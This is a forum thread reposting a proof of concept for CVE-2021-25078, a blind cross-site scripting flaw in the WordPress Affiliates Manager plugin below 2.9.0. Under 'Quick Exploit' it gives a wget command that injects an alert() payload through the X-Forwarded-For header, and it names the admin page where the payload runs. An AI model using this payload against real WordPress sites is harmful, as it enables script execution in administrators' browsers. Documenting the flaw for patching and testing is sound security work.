Welcome to Dark Area

Explore, Secure, Evolve – IT, Cybersecurity & Ethical Hacking

ATTENTION! Due to account issues, our mails are going into spam. Please, do not forget to check the spam folder for confirmation mails.

 Register…

WordPress [CVE-2021-25078] - Affiliates Manager < 2.9.0 - Blind Cross Site Scripting (WordPress Plugin)

  • Thread starter Dark
  • Start date
  • Replies 0
  • Views 103

    • Important Notice

    This site provides security information, including vulnerabilities and exploits, exclusively for educational purposes. Users are responsible for ensuring their activities comply with all applicable laws and regulations. The site owner disclaims any liability for misuse of the content.

Dark

Dark

Owner

Joined
Mar 21, 2024
Messages
40

[CVE-2021-25078] - Affiliates Manager < 2.9.0 - Blind Cross Site Scripting

Product: WordPress Plugin (Affiliates Manager < 2.9.0)

Severity: Medium (6.1)

Explanation: An unauthenticated user can send xss payloads in http headers (e.g.: X-Forwarded-For: <script>alert(123)</script>) when visiting vulnerable wordpress website, and full http logs appear in admin panel without sanitizing, it causes blind xss vulnerability.

Quick Exploit:

As Unauthenticated User:
wget "https://wordpress-site.com/?wpam_id=1" --header="X-Forwarded-For: <img src onerror=alert(/XSS/)>" -q -O-



XSS will be executed when administrator enters:
https://wordpres-site.com/wp-admin/admin.php?page=wpam-clicktracking



Proof of Concept (Affiliates Manager Plugin v2.8.4):


Crafting and Sending exploit:
r8ddvo7.png



Creating normal request for understanding which side has been affected.
4j8k7ij.png



Finally, we got it.
kq0vs0j.jpg

 
You must log in or register to reply here.

Online statistics

Members online
0
Guests online
3
Total visitors
3
Totals may include hidden visitors.

Forum statistics

Threads
36
Messages
41
Members
26
Latest member
l4ntly7

Share this page

Top